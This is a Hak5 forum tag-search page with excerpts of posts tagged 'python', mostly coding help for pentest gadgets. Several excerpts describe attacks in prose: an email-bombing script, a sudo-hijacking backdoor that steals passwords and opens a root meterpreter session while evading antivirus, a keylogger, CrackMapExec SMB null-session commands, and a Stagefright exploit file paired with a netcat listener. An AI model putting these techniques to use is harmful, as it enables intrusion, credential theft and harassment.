Jump to content

Search the Community

Showing results for tags 'python'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. Hello community, Nice to be hear. I just wondered is their a more effective way of email bombing than I am currently doing? I have a simple home made python script which allows me to connect to a Google account I create ( Basic I know ) I am trying to work on over Email provider support. But anyway... I can't get past the " Text only input " is there a way to send files in email bomb attacks? Also how would this be done and is there a way to get past the terminal from cutting out due to the server closing the connection? is this due to the email service closing due to the volume of emails? if so is there a way I could logically delay the time between messages? Lastly all my emails come through to the same email. How can I get it to create a new email ( conversation ) each email? would it be a simple character var and change on each send? how would i implement this?
  2. I need some help in writing some code to automate some of my jobs and I can't figure an efficient way to just get the wireless card and ethernet mac addresses. im trying to use something similar to this ips = subprocess.check_output(["WMIC", "NICCONFIG", "where", "IPEnabled=true", "get", "IPAddress"], universal_newlines=True).strip().split("\n\n")[1:]
  3. I want to build a USB rubber ducky simulator using python. How Can I simulate keyboard presses in python? Can someone point me in the right direction please? In an ideal world I would love to develope a suite of tools that can be accessed from a GUI to configure/test and monitor Hak5 gear, but sadly this maybe beyond my capabilities :-(
  4. Taking the idea (again, mad props to sudoBackdoor) a bit further with some python scripting, I scared myself (and unintentionally pwned myself a few times as well) with this thing. How it works: The user's .bash_profile or .bashrc gets tweaked to point to ~/.config/sudo A python script called sudo is installed there. [Patience is required here, as you need to wait for the user to sudo some command now] This will take their password, validate it by running its own sudo command (literally just echoing something) and seeing if it works Once it confirms a good password, it stores the password for later retrieval and executes the intended sudo command in a subshell that the user shouldn't even notice a difference in After executing their command, it will use the password to sudo open up a reverse https meterpreter session on the machine. It will do this every time sudo is run. I unintentionally self pwned a few times, because the meterpreter session is being run as root, and one must sudo kill to get rid of it. Sudo killing it will get rid of the existing session as expected, but then will open up a shiny new session as its last step (unless the python script is gone). Because antivirus tends to recognize the base64-encoded meterpreter payload as malicious, I also wrote a script called "shellSmuggler.py" to go with it. If you use the msfvenom command I supply here, you should be able to pipe the output to the shellSmuggler and scramble the payload enough that antivirus doesn't alert on/block it anymore. You will need to know your listening machine's IP and listening port (obviously).
  5. I decided to put together a payload to get myself familiar with the bunny. This was inspired by SudoBackdoor and borrows heavily from it, but uses python because I'm more fluent in that than bash. I'm hoping to have this thing completed by the end of this week or possibly the weekend. The code under development is on my github at https://github.com/michael-weinstein/bashbunny-payloads/tree/darkCharlie/payloads/library/credentials/darkCharlie
  6. I was going to make some mods to the QUACK Python code. I'm an old Perl guy so decided to use the REPEAT command as a guide to the Python syntax and style. After a lot of hair pulling, I discovered that the REPEAT command does not work in the first place, so my mods based on REPEAT don't either. The Python QUACK code attempts to save previous line state in the "context" list variable (actually an immutable tuple), but it also appears to re-initializes it to empty for every new line, eliminating any state for REPEAT to ever act on. I'm not really a Python guy, so I guess my first question is: Does REPEAT work on the 1.3 firmware?
  7. WhiteDNS WhiteDNS is something I've been working on for a few days now. It's basically a small DNS server that only serves domains it knows/has listed. A whitelisting DNS server, hence WhiteDNS. Link to the Github repo is here. Instead of explaining everything it can do, I'll just provide examples of queries to this DNS server. The main documentation is in the python script itself and there is a bit on the Github. If I query "test" using nslookup.. [ SERVER SIDE ] # test isn't in ROUTES therefore only responds with a preset IP if query not in ROUTES then return 127.0.0.1 [ CLIENT SIDE ] QUERY: nslookup test 127.0.0.1 # Assuming server is hosted on local PC OUTPUT: Non-authoritative answer: Server: test Addresses: 127.0.0.1 If I give "test" a corresponding IP then query "test" using nslookup.. [ SERVER SIDE ] # test is in ROUTES therefore responds with corresponding IP test. -> 192.168.1.10 if query not in ROUTES then return 127.0.0.1 if query is in ROUTES then return query's set IP (192.168.1.10) [ CLIENT SIDE ] QUERY: nslookup test 127.0.0.1 # Assuming server is hosted on local PC OUTPUT: Non-authoritative answer: Server: test Addresses: 192.168.1.10 What if the querier is under a company domain or some other domain? Won't it come up with this super long domain name that the server can't recognise? Well, yes, you are correct. However, you are also not.. Example: If I query "test" and my PC is under the domain "company.local" this is what happens: [ SERVER SIDE ] # test is in ROUTES therefore responds with corresponding IP test -> 192.168.1.10 # notice how I removed the '.' here as well string = first bit of query (test.company.local.) if string not in ROUTES then return 127.0.0.1 if string is in ROUTES then return query's set IP (192.168.1.10) [ CLIENT SIDE ] QUERY: nslookup test 127.0.0.1 # Assuming server is hosted on local PC OUTPUT: Non-authoritative answer: Server: test.company.local Addresses: 192.168.1.10 This server can potentially be made into a payload and served on the Bunny for all your DNS pentesting needs. That was my end goal and now that I've done the hard part I figured I would release this as a python server and let others create payloads on it. Because it is a whitelisting server you can set the primary DNS server on a PC to the Bunny (which is hosting the server) and block any phone-homes made by the PC allowing you to basically ignore the rest of the network's hostnames. Or you could collect them all or change them all to go through the Bunny instead..or reset all the hostnames to go to a specific IP (does that already, really..). Possibilities are as far as a DNS server goes! :P I hope this helps someone achieves their DNS pentesting dreams or even helps you understand how a DNS server works. Keep in mind though, this is a very simple DNS server and only responds with generic answers. It can't handle ridiculously complex DNS queries - not that many internal queries require that.
  8. TLDR: https://github.com/ThoughtfulDev/PyDuckGen Hey, since the Simple-Ducky Payload Generator is discontinued i think.. i just wanted to create an easy way to generate existing payloads and move the needed files to the Rubber Ducky. PyDuck is a Python Script which helps you to get your once written USB Rubber Ducky Payloads onto your Duck's SDCard quickly. You can even change variable components by using a simple set <attribute> <val> command. All of this is made easy with a Metasploit like interface. Simply choose your payload with use <payload> configure it and there you go :) Have a look into the bundled modules in the module folder to understand the attributes but here is a quick explanation. Your duckscript is: ... STRING <replacable_text> ... In your module.json just add you attribute to the attributes tree like this: "attributes": { "replacable_text": "The default value" } If you know load your payload with 'use <your_payload>' you can now use the following: set replacable_text Hak5 is awesome :) If you then generate the inject.bin using: gen or generate the <replacable_text> will be replaced with Hak5 is awesome. Isn't that...awesome? :D You can even add folder/files to your module.json which are needed for you payload (have a look at the mimikatz_lazagne payloads to see how this works.) I really suggest that you have a look at the existing payloads to figure out how this works :D More Information can be found on the Github Repo: https://github.com/ThoughtfulDev/PyDuckGen Let me know what you think.
  9. I'm stuck while working on a prank payload. While the target computer is locked or logged off, I'm trying to find a way or see if it's even possible to copy a single file from the BB onto the target computer either into multiple Users folders or searching for a specific named file and replacing them with the file on the BB. Since the target computer would be locked or logged out, using the command prompt or powershell scripts is out of the question. I'm thinking that anything done would have to be solely done on the BB side, setup as say the SMB_Exfil payload only in reverse with the BB setting up as an SMB server, copy the file from the BB to an SMB temp folder, pulling the targets IP, and either copying the file over to the target computer or searching for a file name within the target computer from the IP address and replacing it with file. I'm just thinking out loud since I'd started working on this and using a CMD script to do the job (which works so far, but I'm still testing it), but wanted to see if it was possible to remove the CMD script for this to be accomplished without needing to be logged into the computer. If it takes learning python to write a script for the BB to be able to do this I'll do it, but I'd rather ask if anyone else thinks or knows it would be possible. Any thoughts?
  10. Hey all, I've got a problem with my python server. The Bash Bunny doesn't want to handle it forever, so it seems to stop handling after about 5 seconds (or shutting it down, can't tell which). The exact same code works locally on my computer (python script that runs a simple SocketServer), and it runs forever (using httpd.serve_forever()), however the BB doesn't want to run it forever. Any ideas why the BB stops handling? EDIT: Just for those that are interested, the browser error says "Site cannot be reached; connection was reset (ERR_CONNECTION_RESET)".
  11. Hello, do you guys know if it's possible to capure Client(s)-to-WifiRouter(s) probe request, just like Karma does, but without "answering" to any of those requests by using python? I mean, to passively monitor surrounding devices' probes and log them in to a text file or something, but be invisible in their wifi network list. Any python libraries suggestions would be appreciated!
  12. Once I deploy the LAN Turtle, SSH into it using my own VPS, is it possible to run my own custom python scripts using the LAN turtle terminal. For example: I write my own python keylogger script and SCP it onto my LAN Turtle. Is there a way to run this? I'm unsure if this will work as this is connected via ethernet, not necessarily a normal USB stick. Thanks for your time.
  13. CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes queues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so: cd /pentest curl -k -O https://bootstrap.pypa.io/get-pip.py Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script: python get-pip.py That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work. apt-get install build-essential libssl-dev libffi-dev python-dev Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip: pip install crackmapexec Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is: crackmapexec $TARGET_IP That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this: crackmapexec $TARGET_IP -u "" -p "" That tells CME to try a Null session with SMB. If the target disallows Null sessions nothing bad happens. You still get the basic OS details. If the target allows for a Null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  14. Hello everyone! I'm currently trying to make the script "fakeAP" work on my Pineapple. This script simply creates a fake AP, I let you imagine what for. The problem is: This script require Scapy to work. I tried to install it but when I run the setup script, It says that it can't find "distutils.core". Distutils is used to install python package. I searched a way to install it but, when I try to install it (via OPKG or from source), it says: * pkg_write_filelist: Failed to open //usr/lib/opkg/info/python-distutils.list: No space left on device. * opkg_install_pkg: Failed to extract data files for python-distutils. Package debris may remain! * opkg_install_cmd: Cannot install package python. * opkg_conf_write_status_files: Can't open status file //usr/lib/opkg/status: No space left on device. So, my Pineapple don't have enough space left. I tried to tweak the opkg.conf so it can install it on my sd card (mounted on /sd) but it fails everytime. I deleted a bunch of my modules and temp files, but the result is the same. Has anyone a solution ? Thanks and sorry for bad english! :)
  15. Hi, As a starter project for messing around with TK, I made a replacement for the wp6.sh script with a GUI. It's a bit basic to say the least, but it should be functional. I'm aware that I should really be using classes to build my application, but this is just an excuse to code something. Hopefully, someone might ind this useful. Anyway, the code (such as it is) is located here: https://github.com/phpsystems/PineappleSetupGui Phpsystems.
  16. Hi, I've been crunching away at this python3 script(s) for the past month and I would like some input on how to make it better. I based this bot off of Paul Mutton's work from the book “IRC Hacks.” Threading, having less hard coded variables, self healing, and making this code less dyslexic is definitely on the to do list! Let me know what you think :3 https://github.com/notpike/PikeBot
  17. Hi all, I was looking at trying wifite2 on the tetra mainly for the 5ghz addition over the std wifite which works reasonably well. It seemed to require stty, so I installed coreutils-stty and that got me a little further so it runs and finds networks. But as soon as you specify a target it hits an issue with :- WPA-handshake attack: waiting for handshake... [!] Error: global name 'err' is not defined [!] Full stack trace below [!] Traceback (most recent call last): [!] File "./Wifite.py", line 171, in <module> [!] w.main() [!] File "./Wifite.py", line 34, in main [!] self.run() [!] File "./Wifite.py", line 120, in run [!] attack.run() [!] File "/root/wifite2-master/py/AttackWPA.py", line 80, in run [!] if handshake.has_handshake(): [!] File "/root/wifite2-master/py/Handshake.py", line 61, in has_handshake [!] if len(self.tshark_handshakes()) > 0: [!] File "/root/wifite2-master/py/Handshake.py", line 127, in tshark_handshakes [!] if not Process.exists('tshark'): [!] File "/root/wifite2-master/py/Process.py", line 51, in exists [!] if stdout == '' and err == '': [!] NameError: global name 'err' is not defined At first i thought this was to do with STDOUT & STDERR so I looked at libdaemon from opkg but that doesn't seem to make a difference. Did anyone already try wifite2 and if so did you get any further? would love to hear from you. Cheers all
  18. Looking to install some python modules for a project. pip is not there. Tried a workaround that seemed have failed. So what are my options? And can I get a list of python modules available for the Turtle ahead of time? (to avoid wasting time)
  19. Hello there guys! nice to see you! Just wanted to know about the power of python from you leets, im a beginner! trying to learn new things of python can you please tell me what are the things could be done with python?? Can I use python for IoT devices? is it gonna help me only in scripting ?
  20. Hello there! Which is the best programming language to start with? I have already learned a bit of C and JAVA. May I know the best language to start with? I want to learn to make wireless hacking tools for linux with my own coding knowledge, kindly help! Thanks!
  21. I have a bit of an odd question that I'm hoping someone here can point me in the right direction to figure out. I have been looking at a DVR which I purchased for the express purpose of poking around on. I was able to gain access to it via telnet, and found some interesting things. I found the password hashes for the web portal. The passwords themselves are hashed using an algorithm detected by JTR as "dahua". Outside of the source code for the JTR module located at http://fossies.org/linux/john/src/dahua_fmt_plug.c I cannot find any information about how this algorithm works. I spent several hours using my google-fu, but I haven't found anything yet. Here is what I have so far from reading the source code from above: The password is hashed using MD5, then compressed using the compress method included above. I don't know C well enough to be able to translate the rest of it, but that seems to be 99% of the work. I am getting hashes in the correct format using the code posted below, but they aren't correct. The code from the JTR module expects a 16 character hash, but MD5 returns a 32 character hash. I am quite rusty on C/C++, but I'm having a really hard time understanding the flow of the C program of the JTR module, particularly with pointers, and memory allocations. I know my python file has some errors in it, because it wasn't until I started writing this that I realized it was only checking the first 16 characters of the hash, not the full 32. It doesn't matter because the compressor as written only reduces the length by 2 anyway. dahua_hash.py
  22. Hi Guys, I've been working on a python script to help organize the pineapple's SSID pool. Most of the work I do with the pineapple has to do with attracting unassociated clients. As such it's sometimes undesirable to have an extremely large SSID pool. For instance, if I'm trying to grab a client and it's looking for an SSID that's 2250 on the list, but the pineapple rolling through SSIDs at number 5 on the list, I might miss my opportunity. To help combat this, I generally use an SSID list that is smaller in number, but the SSIDs on that list are SSIDs that many people use (Ex: attwifi, panera, CableWifi). Up until now I've just been looking at multiple lists trying to pick out ones I think clients will be broadcasting. The script makes use of pineapple's pineap.log file. You can find this file by going to the Logging system module and clicking the Download button after you've used Pineap to log some probe requests. You can also find it on the pineapple in the /tmp/ directory. This file starts anew after each restart. If you place pineap.log in the same directory as the script and run the script, the script will: - harvest of the SSIDs and the mac addresses that probed for them - eliminate all duplicate requests - assign each SSID a rank based on the number of times a unique device requested that SSID - sort the SSID with the highest rank to the top with each successive rank behind - write the results to two files. The first file, SSIDlist.log, has just SSIDs listed in their appropriate rank order. The second file, finalRanking.log, has the same but each SSID has it's rank next to it. What I then do is edit SSIDlist.log, erase all but the top 100 SSIDs, rename the file to ssid_file, and place it in the pineapple's /etc/pineapple/ directory. (More on that here: https://forums.hak5.org/index.php?/topic/38060-ssid-pool-management/?p=275753) Now my standard pool of SSIDs are the top 100 SSIDs used in my part of the world. Just to give you an example of how I'm using this on the ground. Yesterday I took my pineapple to a large target area. I needed to know what SSIDs would most likely ensnare the devices and the employees' personal devices on that campus. I spent over an hour walking the grounds and ended up with over 450 SSIDs. Using this script, I'll cut that 450 down to 100 or even 50 to increase the speed and efficiency of grabbing a client. The example files that are with the script are from me driving around Tampa yesterday with the pineapple in the back of my car. Just for the record, war driving is a terrible way to collect probe requests for an area. You're better off walking. You might be asking, why isn't this a module? First, I've never used javascript or php. I'm attempting to learn, but I'm not even close. So if anyone finds this helpful enough and wants to make it a module, be my guest. Finally, I'd like to make a suggestion. If you use this script for a particular area and you don't mind sharing, I would like to make a repository of Top 100's on regions all over the world. I have webspace at skinnyrd.com and can post them all there in an organized fashion. The more distinct the region, like neighborhoods or industrial parks in cities vs entire metro areas, the better. If you live in a small town, that's welcome to. If you'd really rather not share, no big deal. If you have any questions just let me know. Have a great day! SSIDsort.zip
  23. Hi, My name is GoldraK. We have created a compiler for the USB Rubber Ducky written in Python that can be used as an application to compile or as a class of python for other projects. Fixed the keyboard in Spanish, she had several failures with \ / and some characters more The encoder is based on [Encoder] Duck Encoder V2.6.3 Released 01/12/14 You can download it from github project https://github.com/securipy/USB-Rubber-Ducky Any problems that you find or suggestions do not hesitate to say it Happy Cuack
  24. If you got cool python library that you use post here.
  25. Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The script correctly generate an file.mp4 without an error. After i've launch a listener with: $netcat -l -p 4444 I've sended the file.mp4 to my smartphone and i've tried to exec this. The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result. Any solution? Thanks everyone and sorry for my english ;-P
×
×
  • Create New...